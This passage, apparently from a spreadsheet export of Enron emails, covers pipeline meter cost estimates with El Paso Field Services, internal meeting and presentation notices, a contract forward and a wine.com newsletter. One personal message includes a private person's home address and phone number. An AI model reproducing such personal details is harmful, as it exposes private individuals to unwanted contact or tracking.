Freeman/NPNG/Enron@ENRON, Shahnaz Lakho/FGT/Enron@ENRON, Donna _x000D_
Scott/FGT/Enron@ENRON, Ray Neppl/NPNG/Enron@ENRON, Bob _x000D_
Martinez/ET&amp;S/Enron@ENRON, Kimberly Watson/ET&amp;S/Enron@ENRON, Jo _x000D_
Williams/ET&amp;S/Enron@ENRON, Tamara Hopkins/ET&amp;S/Enron@ENRON, Caroline _x000D_
Barnes/FGT/Enron@ENRON, Tony Pryor/ET&amp;S/Enron@ENRON, Steven _x000D_
Harris/ET&amp;S/Enron@ENRON, Maria Pavlou/ET&amp;S/Enron@ENRON_x000D_
cc: Ricki Winters/ET&amp;S/Enron@Enron, Ruth Mann/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: Draft May 9 Project Why Presentation_x000D_
_x000D_
Attached is a current draft of the Project Why Presentation.   _x000D_
_x000D_
The first set of slides includes the overview, an explanation that the _x000D_
presentation focueses in on only a few of the ideas, the electronic _x000D_
contracting presentation, the team 2 real time invoice vision, and team 3's _x000D_
auction thoughts._x000D_
_x000D_
_x000D_
_x000D_
Next in the package would be team 3's knowledge call center concept_x000D_
_x000D_
_x000D_
_x000D_
Last but not least would be the Team 4 Internet/Intranet concept_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 7 Mar 2001 11:23:57 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'arnie.bailey@enron.com', 'perry.frazier@enron.com'})</t>
  </si>
  <si>
    <t>RE: EPFS interconnect</t>
  </si>
  <si>
    <t xml:space="preserve">I just got off the phone with El Paso Field Services.  At this time, I now need 2 cost estimates.  One to increase the facilities to be able to handle up to 65,000 MMBtu/d and the second to increase the facilities to be able to handle up to 90,000 MMBtu/d.  EPFS has indicated this incremental flow could come to TW as soon as mid-May.  Please advise.  Thank you._x000D_
_x000D_
Lorraine_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lindberg, Lorraine  _x000D_
Sent:	Wednesday, March 07, 2001 9:05 AM_x000D_
To:	Frazier, Perry; Bailey, Arnie_x000D_
Cc:	Faucheaux, Eric; Asante, Ben; Carlsbad, Team; Jolly, Rich; McCracken, Mike; Moore, James; Chanley, Earl; Hyatt, Kevin_x000D_
Subject:	RE: EPFS interconnect_x000D_
_x000D_
I have not requested a Level A cost estimate.  I need the exact amount we think this will cost so that EPFS will fund the entire amount._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Frazier, Perry  _x000D_
Sent:	Tuesday, March 06, 2001 4:55 PM_x000D_
To:	Bailey, Arnie_x000D_
Cc:	Faucheaux, Eric; Lindberg, Lorraine; Asante, Ben; Carlsbad, Team; Jolly, Rich; McCracken, Mike; Moore, James; Chanley, Earl_x000D_
Subject:	Re: EPFS interconnect_x000D_
_x000D_
Status Report for 3/6/01_x000D_
_x000D_
Jim Rischer called and we discussed his Teams ideas on the mods to increase the flow to 60 mmcfd. _x000D_
_x000D_
James Moore &amp; myself sat down and reviewed his project file for the current design.  We reviewed the notes of his field visit to the site and the information from the EPFS field hand.  _x000D_
_x000D_
Action Plans   _x000D_
_x000D_
1.  Informed Lorraine that I would give her a status update next Tuesday 3/13/01 on the progress to complete a level A cost estimate.  Tenative completion of 3/19/01 given at this time._x000D_
_x000D_
2.  James Moore will check out the ultasonic meter requirements, availability and costs.  He will call George Kneisley to verify that the GFC TAS Sys. II, will work with the USM.  He will also contact Becker to make sure the flow controll valve will handle the 60 mmcf, noise levels and fps limits.   These results will dictate the major costs for the modifications._x000D_
_x000D_
3.  Carlsbad Team, I need to know if there are any equipment needs, like signal splitter on the USM for EPFS and what about the current orifice transmitters.  Is the chromatagraph on site?  Purchase power is on site, right.  _x000D_
_x000D_
Let me know if you have any additional information or scope changes to these action plans._x000D_
_x000D_
PT 713-853-0667_x000D_
_x000D_
_x000D_
   _x000D_
 &lt;&lt; OLE Object: Picture (Device Independent Bitmap) &gt;&gt; 	  From:  Arnie Bailey                           03/06/2001 04:15 PM	_x000D_
		_x000D_
_x000D_
_x000D_
To:	Perry Frazier/ET&amp;S/Enron@ENRON_x000D_
cc:	Eric Faucheaux/ET&amp;S/Enron@Enron, Lorraine Lindberg/ET&amp;S/Enron@ENRON, Ben Asante/ET&amp;S/Enron@ENRON, Team Carlsbad/ET&amp;S/Enron@Enron, Rich Jolly/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject:	Re: EPFS interconnect_x000D_
_x000D_
Perry,_x000D_
Let the team and I know what we can do to help.  Let me know how things progress._x000D_
Thanks,  Arnie_x000D_
---------------------- Forwarded by Arnie Bailey/ET&amp;S/Enron on 03/06/2001 03:03 PM ---------------------------_x000D_
_x000D_
 &lt;&lt; OLE Object: Picture (Device Independent Bitmap) &gt;&gt; _x000D_
Rich Jolly_x000D_
03/05/2001 09:04 PM_x000D_
To:	Eric Faucheaux/ET&amp;S/Enron@Enron_x000D_
cc:	Perry Frazier/ET&amp;S/Enron@ENRON, Lorraine Lindberg/ET&amp;S/Enron@ENRON, Ben Asante/ET&amp;S/Enron@ENRON, Team Carlsbad@Enron, Arnie Bailey/ET&amp;S/Enron@Enron _x000D_
_x000D_
Subject:	Re: EPFS interconnect   &lt;&lt; OLE Object: StdOleLink &gt;&gt; _x000D_
_x000D_
Arnie and Team will you work with Perry on this. Let me know how I can help. Eric thanks for sending to me._x000D_
Thanks_x000D_
Rich_x000D_
_x000D_
_x000D_
_x000D_
 &lt;&lt; OLE Object: Picture (Device Independent Bitmap) &gt;&gt; 	Eric Faucheaux 03/06/2001 07:15 AM  &lt;&lt; OLE Object: Picture (Device Independent Bitmap) &gt;&gt; 	_x000D_
_x000D_
To:	Perry Frazier/ET&amp;S/Enron@ENRON_x000D_
cc:	Lorraine Lindberg/ET&amp;S/Enron, Ben Asante/ET&amp;S/Enron@ENRON, Rich Jolly/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject:	EPFS interconnect_x000D_
_x000D_
_x000D_
Perry, please take this one and reply to Lorraine expected delivery date.  Thanks, EF, x33395_x000D_
_x000D_
---------------------- Forwarded by Eric Faucheaux/ET&amp;S/Enron on 03/06/2001 08:15 AM ---------------------------_x000D_
From:	Lorraine Lindberg/Enron@enronXgate on 03/05/2001 04:49 PM_x000D_
To:	Eric Faucheaux/ET&amp;S/Enron@Enron_x000D_
cc:	Kevin Hyatt/ENRON@enronxgate _x000D_
_x000D_
Subject:	EPFS interconnect_x000D_
_x000D_
Eric - Please provide me with a cost estimate to increase the meter facilities from 40,000 MMBtu/d to 60,000 MMBtu/d at the new receipt point with El Paso Field Services in Eddy County, NM.  I would like a "good to go with" cost estimate so that I may request full reimbursement from EPFS.  EPFS has indicated they will be in a position to send this incremental gas to TW in a couple of months.  Please let me know the estimated time you need to develop this cost estimate.  Thanks._x000D_
_x000D_
Lorraine_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 2 Aug 2000 04:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jenny.helton@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'travis.mccullough@enron.com', 'lance.schuler-legal@enron.com', 'stuart.zisman@enron.com', 'janice.moore@enron.com', 'jason.peters@enron.com', 'brent.hendry@enron.com', 'bob.carter@enron.com', 'marcus.nettelton@enron.com', 'martin.penkwitz@enron.com', 'peggy.banczak@enron.com', 'anne.koehler@enron.com', 'sheila.tweed@enron.com', 'ann.white@enron.com', 'richard.sanders@enron.com', 'roger.balog@enron.com', 'janet.moore@enron.com', 'teresa.bushman@enron.com', 'barton.clark@enron.com', 'barbara.gray@enron.com', 'elizabeth.sager@enron.com', 'lou.stoler@enron.com', 'shonnie.daniel@enron.com', 'mark.taylor@enron.com', 'mark.haedicke@enron.com', 'stacy.dickson@enron.com', 'mark.greenberg@enron.com', 'dan.hyvl@enron.com', 'dan.lyons@enron.com', 'gerald.nemec@enron.com', 'sara.shackleton@enron.com', 'shari.stack@enron.com', 'wayne.gresham@enron.com', 'james.grace@enron.com', 'kay.mann@enron.com', 'shawna.flynn@enron.com', 'harry.collins@enron.com', 'michael.robison@enron.com', 'david.portz@enron.com', 'julia.murray@enron.com', 'carol.clair@enron.com', 'alan.aronowitz@enron.com', 'peter.vecchio@enron.com', 'robert.bruce@enron.com', 'steve.hooser@enron.com', 'lisa.mellencamp@enron.com', 'mary.cook@enron.com', 'michelle.cash@enron.com', 'leslie.hansen@enron.com'})</t>
  </si>
  <si>
    <t>Antitrust Training</t>
  </si>
  <si>
    <t>I apologize for the previous e-mail regarding the above.  _x000D_
_x000D_
The computer file is corrupt so I will send a hard copy.</t>
  </si>
  <si>
    <t>Wed, 16 Aug 2000 10:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'htebs@huber.com'})</t>
  </si>
  <si>
    <t>Master Firm Purchase/Sale Agreement</t>
  </si>
  <si>
    <t>Brian Stone_x000D_
J.M. Huber_x000D_
_x000D_
At the request of Gerald Nemec, I am forwarding to you the attached Master _x000D_
Firm Purchase/Sale Agreement--Sample Contract for review.  _x000D_
_x000D_
Please do not hesitate to contact me with any questions and or comments _x000D_
regarding this matter._x000D_
  _x000D_
_x000D_
Regards,_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Wed, 23 May 2001 08:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'james.wood@enron.com', 'charles.decker@enron.com', 'mark.bernstein@enron.com', 'marc.ulrich@enron.com', 'edward.baughman@enron.com', 'ken.detina@enron.com', 'jeff.ader@enron.com', 'eric.letke@enron.com', 'greg.sharp@enron.com', 'scott.gahn@enron.com', 'richard.shapiro@enron.com', 'scott.stoness@enron.com', 'ress.young@enron.com', 'brad.snyder@enron.com', 'mark.courtney@enron.com', 'j.frazier@enron.com', 'jeff.merola@enron.com', 'harry.kingerski@enron.com', 'mike.roan@enron.com', 'james.lewis@enron.com', 'susan.landwehr@enron.com', 'daniel.allegretti@enron.com', 'roger.persson@enron.com', 'james.steffes@enron.com', 'christi.nicolay@enron.com', 'guy.sharfman@enron.com', 'roy.boston@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">For any of you who did not get this, attached are the slides from Marc's _x000D_
presentation in the meeting._x000D_
----- Forwarded by Janine Migden/NA/Enron on 05/23/2001 03:07 PM -----_x000D_
_x000D_
	Marc Ulrich@EES_x000D_
	05/17/2001 08:08 AM_x000D_
		_x000D_
		 To: Janine Migden/NA/Enron@ENRON_x000D_
		 cc: _x000D_
		 Subject: Re:_x000D_
_x000D_
_x000D_
_x000D_
Thanks for the coordinating the meeting.  Your involvement has been _x000D_
invaluable._x000D_
_x000D_
Marc_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Janine Migden@ENRON_x000D_
_x000D_
05/16/2001 07:59 PM_x000D_
_x000D_
To: Marc Ulrich/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
Mark, Thanks for the great presentation.  It really helped focus the _x000D_
meeting.  Could you forward to me the other slides that you had so that I can _x000D_
distribute them to everyone?  Thanks._x000D_
Janine_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 24 May 2001 14:28:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'daniel.diamond@enron.com', 'bob.shults@enron.com', 'jake.staffel@enron.com', 'john.pavetto@enron.com', 'mike.haney@enron.com', 'leonardo.pacheco@enron.com', 'david.forster@enron.com', 'john.allario@enron.com', 'michael.bridges@enron.com', 'carl.carter@enron.com'})</t>
  </si>
  <si>
    <t>Origination Meeting</t>
  </si>
  <si>
    <t>"Please attend an origination meeting on Tuesday, May 29  from 8:30 to 10:00, location EB2751.  The focus of this meeting will doing a walkthrough of an EnronOnline demo for both EnronOnline hosted products and X-online hosted environments. This demo will cover all relevant functionality of the system, similar to what we have been presenting to GM et al."_x000D_
_x000D_
Thanks, _x000D_
_x000D_
_x000D_
Andy Zipper</t>
  </si>
  <si>
    <t>Fri, 28 Apr 2000 04:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Plans...</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Chris Dorland/CAL/ECT on 04/28/2000 11:57 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Tasha Loewen &lt;tloewen@cal.sunpub.com&gt; on 04/28/2000 08:45:07 AM_x000D_
To: Chris.Dorland@enron.com_x000D_
cc:  _x000D_
Subject: Re: Plans..._x000D_
_x000D_
_x000D_
Hey buddy,_x000D_
_x000D_
 What were you doing in Mexico?  Must have been really nice!  As far_x000D_
as tomorrow is concerned, I think that we may have a few drinks before the_x000D_
club scene, so you are more than welcome to stop over for a few. I would love_x000D_
to introduce you to some of my "single" friends.  Actually, pretty much all_x000D_
of them are single right now. (Teehee). Anyhow, I imagine that we will begin_x000D_
at about 8 or so, hope to see ya there. I live in Marda Loop in the SW. It's_x000D_
just off off Crowchild. My address is #2, 2106, 35th ave SW. Exit onto 33rd,_x000D_
and it's easy from there. If you have any ques'ns, call me @ 249-1571._x000D_
Depending on which way you come, it is really easy to find. You can also get_x000D_
there by 14th, or 17th, but in either case, you will still turn onto 33rd._x000D_
Talk to you soon!_x000D_
T_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 6 Jan 2000 15:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kruscitti@aol.com'})</t>
  </si>
  <si>
    <t>Fwd: Dogs</t>
  </si>
  <si>
    <t>Return-path: KRuscitti@aol.com_x000D_
From: KRuscitti@aol.com_x000D_
Full-name: KRuscitti_x000D_
Message-ID: &lt;0.12be7f0f.25a39dc5@aol.com&gt;_x000D_
Date: Tue, 4 Jan 2000 14:02:29 EST_x000D_
Subject: Dogs_x000D_
To: lisa.a.tagert@jci.com_x000D_
MIME-Version: 1.0_x000D_
Content-Type: multipart/mixed; boundary="part2_a3.a3c6b9ea.25a39dc5_boundary"_x000D_
X-Mailer: AOL 3.0 for Windows 95 sub 18_x000D_
_x000D_
_x000D_
cccc_x000D_
_x000D_
 - DCP00617.BMP</t>
  </si>
  <si>
    <t>Wed, 28 Mar 2001 22:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'pgranoff@wine.m0.net'})</t>
  </si>
  <si>
    <t>Deals of the Week</t>
  </si>
  <si>
    <t xml:space="preserve">[IMAGE]_x000D_
wine.com_x000D_
_x000D_
[IMAGE]	[IMAGE]	[IMAGE]	[IMAGE]	[IMAGE]	[IMAGE]	[IMAGE]_x000D_
[IMAGE]	[IMAGE]	[IMAGE]	_x000D_
			_x000D_
			[IMAGE]_x000D_
			[IMAGE]_x000D_
			[IMAGE]_x000D_
			In This Email_x000D_
			-Deals of the Week_x000D_
			-Great Wines_x000D_
			-Peter Granoff on Wines for Easter and Passover_x000D_
			-Wine Team Picks: Lynda Handley on Oscar-Alternative Wines_x000D_
			-The Best of Wine in the Palm of Your Hand_x000D_
			-From Our Partner..._x000D_
			_x000D_
			Deals of the Week_x000D_
			_x000D_
			Every wine we sell at wine.com has been tasted and recommended by our _x000D_
in-house wine experts. This applies to familiar labels as well as obscure _x000D_
ones. In short, if you see something from a famous producer on our site, it's _x000D_
because that wine is worth buying and drinking, not simply because it has _x000D_
name recognition. _x000D_
			_x000D_
			Our newest feature, Deals of the Week, offers you wines that are not only _x000D_
recommended for high quality but also for outstanding value. Every Deals of _x000D_
the Week selection is specially priced for a limited time to encourage you to _x000D_
experience the best of wine. _x000D_
			_x000D_
			Don't miss out. Click here to see our Deals of the Week. _x000D_
			_x000D_
			[IMAGE]_x000D_
			[IMAGE]_x000D_
			[IMAGE]_x000D_
			[IMAGE]_x000D_
			[IMAGE]_x000D_
			_x000D_
			Great Wines_x000D_
			To learn more about each item listed below, simply click on its name. _x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			[IMAGE]_x000D_
			[IMAGE]_x000D_
			[IMAGE]_x000D_
			[IMAGE]_x000D_
			[IMAGE]_x000D_
			[IMAGE]_x000D_
			[IMAGE]_x000D_
			[IMAGE]_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			1998 Hofstatter Gewurztraminer Kolbenhof, Italy, $25_x000D_
			_x000D_
			_x000D_
			1998 Hofstatter Gewurztraminer Kolbenhof, Italy, $25_x000D_
			Alsace, watch out! Here comes Italian Gewurztraminer. _x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			1998 Virtual Vineyards Zinfandel, Shenandoah Valley, California, $15_x000D_
			_x000D_
			_x000D_
			_x000D_
			1998 Virtual Vineyards Zinfandel, Shenandoah Valley, California, $15_x000D_
			Gnarly old-vine Zinfandel from the Sierra Foothills. _x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			Friends   Family Passover Three-Pack, $40_x000D_
			_x000D_
			_x000D_
			Friends &amp; Family Passover Three-Pack, $40_x000D_
			Three delicious kosher Passover wines. _x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			1999 Domaine Sarret Chardonnay Vin de Pays d'Oc, France, $7.95_x000D_
			_x000D_
			_x000D_
			_x000D_
			1999 Domaine Sarret Chardonnay Vin de Pays d'Oc, France, $7.95_x000D_
			A delicious Chardonnay and an excellent value. _x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			1999 Domaine de la Levraudiere Muscadet Sevre et Maine Cuvee les Menucheres, _x000D_
Loire Valley, France, $6.95_x000D_
			_x000D_
			_x000D_
			1999 Domaine de la Levraudiere Muscadet Sevre et Maine Cuvee les Menucheres, _x000D_
Loire Valley, France, $6.95_x000D_
			A must-have Muscadet that's perfect with seafood. _x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			Kosher Duet, $37_x000D_
			_x000D_
			_x000D_
			Kosher Duet, $37_x000D_
			These kosher wines have been produced in accordance with a strict set of _x000D_
Judaic dietary guidelines. _x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			[IMAGE]_x000D_
			[IMAGE]_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			Search our site for other great wines:_x000D_
			[IMAGE]_x000D_
			Red WinesCabernet SauvignonMerlotZinfandelWhite WinesChardonnayBubbly _x000D_
WinesRare WinesWhat's NewSamplersSpecialsPeter's PicksBang for the _x000D_
BuckWineries_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			Peter Granoff on Wines for Easter and Passover_x000D_
			_x000D_
			Easter and Passover are just around the corner, raising the question of what _x000D_
wines best accompany these two holidays. Nobody is better qualified to _x000D_
discuss this topic than wine.com founder Peter Granoff. Not only is he a _x000D_
Master Sommelier, he was also raised in a Jewish-Catholic household. _x000D_
			_x000D_
			Peter's earliest experience of wine was Manischewitz and Mogen David, when he _x000D_
was seven or eight years old. "My (Catholic) mother was very active in _x000D_
celebrating Jewish holidays," he recalls. "We were all given a sip of wine, _x000D_
though it would have been heavily diluted with water." _x000D_
			_x000D_
			Traditionally (or perhaps habitually), kosher wines were simple and sweet -- _x000D_
not the sort of beverage that appeals to grownup connoisseurs like Granoff. _x000D_
"When kosher wine was first made in this country, most of it came from the _x000D_
Concord grape, which has a lot of acid and bitter phenolics in the skin," _x000D_
Peter explains. "It was desirable to preserve some sweetness in the wine in _x000D_
order to make it palatable. Today, though, modern winemaking technology has _x000D_
proven beyond any doubt that kosher wine can pass muster as fine wine in _x000D_
every respect. And I believe that kosher wine should be good before it's _x000D_
anything else -- the fact that it's kosher should be an added benefit." _x000D_
			_x000D_
			Granoff says that all kosher wines on wine.com fit this criterion. For _x000D_
special mention, he singles out the products of Hagafen, which he describes _x000D_
as "classic Napa Valley wines -- a full-bodied Merlot, a bright and elegant _x000D_
Chardonnay, a crisp Sauvignon Blanc, and an off-dry Riesling." _x000D_
			_x000D_
			There's also the 1996 Barkan Cabernet Sauvignon from the Galil region of _x000D_
Israel -- a ripe and concentrated Cabernet that's beginning to show some _x000D_
bottle age -- and some top-of-the-line Laurent Perrier Champagnes, both Brut _x000D_
and Ros,. Perhaps the ultimate all-around wine for this time of year is the _x000D_
sparkling, slightly sweet, kosher Bartenura Asti Spumante from Piedmont, _x000D_
Italy. _x000D_
			_x000D_
			"It's unusual to find an Italian kosher wine, but they're out there," Granoff _x000D_
observes. "Jewish holiday meals often involve an extended family, and with _x000D_
three generations at the table you're likely to encounter disparate _x000D_
preferences in wine. The older generation might have a bias toward something _x000D_
sweet, but a wonderful wine like the Bartenura will also satisfy wine nuts. _x000D_
Better yet, it's only 7 percent alcohol, so you can enjoy it without getting _x000D_
hammered." _x000D_
			_x000D_
			For Easter brunch, Peter recommends refreshing white wines like Riesling and _x000D_
young, fruity Beaujolais-style reds. Then again, since sparkling wine is a _x000D_
lovely and customary accompaniment to brunch, why not bring out the Bartenura _x000D_
Asti Spumante here, too? _x000D_
			_x000D_
			"A kosher Italian sparkling wine for Easter," Peter reflects. "I like that _x000D_
idea." _x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			Wine Team Picks: Lynda Handley on Oscar-Alternative Wines_x000D_
			_x000D_
			Tired of hearing about the Oscars? Then it's time to snuggle down in front of _x000D_
the VCR with a stack of your own favorite movies, some grub, and a good vino _x000D_
that won't break the bank. _x000D_
			_x000D_
			Following are a few of my own favorites for viewing-and-drinking pleasure: _x000D_
			_x000D_
			 "Enchanted April" and Mionetto Ros, Legatura Frizzante, Veneto, Italy, $9.95_x000D_
			"Cinema Paradiso" and 1997 Mocavero Primitivo, Apulia, Italy, $9.95_x000D_
			"Muriel's Wedding" and 1998 Barossa Vale Merlot, Barossa Valley, South _x000D_
Australia, Australia, $16.95_x000D_
			"An Affair to Remember" and Mionetto Prosecco di Valdobbiadene Frizzante, _x000D_
Veneto, Italy, $14_x000D_
			"Zinnin' (sic) in the Rain" and 1996 Ballentine Vineyards Zinfandel Estate _x000D_
Grown, Napa Valley, California, $15_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			The Best of Wine in the Palm of Your Hand_x000D_
			_x000D_
			Take wine.com with you wherever you go. Download our channel from AvantGo to _x000D_
your PDA today. _x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			From our Partner..._x000D_
			_x000D_
			Wine Spectator_x000D_
			_x000D_
			2 FREE ISSUES FROM WINE SPECTATOR_x000D_
			_x000D_
			Wine Spectator is America's foremost wine magazine, bringing you _x000D_
well-informed articles about wine, food, and lifestyle (along with reviews of _x000D_
wines from all over the world) 18 times a year. Click here to receive two _x000D_
risk-free issues._x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			Copyright and copy; 1994-2001 wine.com, Inc._x000D_
			_x000D_
			To UNSUBSCRIBE or UPDATE your newsletter membership, please go to: _x000D_
			http://wine1.m0.net/m/u/vin/vv.asp?e=jdasovic%40enron.com_x000D_
			?_x000D_
			?_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			[IMAGE]_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
			_x000D_
				[IMAGE]	[IMAGE]	[IMAGE]_x000D_
_x000D_
		[IMAGE]	[IMAGE]	[IMAGE]		_x000D_
				[IMAGE]		_x000D_
	[IMAGE]			[IMAGE]	[IMAGE]	_x000D_
[IMAGE]					[IMAGE]	[IMAGE]_x000D_
				_x000D_
						_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 20 Mar 2000 18:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'gemanix@aol.com'})</t>
  </si>
  <si>
    <t>Re: Many</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Helyette,_x000D_
_x000D_
I am in California this week, vacationing with my family. It is a spring_x000D_
break week at Stanford and we shall spend a few days in Calistoga, north of_x000D_
Napa Valley, a place famous for mineral water and geysers._x000D_
_x000D_
I shall talk to Karla when I come back to Houston about the speeding up the_x000D_
process on our side. Our lawyers typically sit on a contract for a few weeks_x000D_
unless we put a lot of pressure on them. American lawyers tend to be very_x000D_
meticulous: this is why the city of Los Angeles alone has more lawyers than_x000D_
entire Japan. I think about two sites for your software: Houston and Europe_x000D_
(most likely London)._x000D_
_x000D_
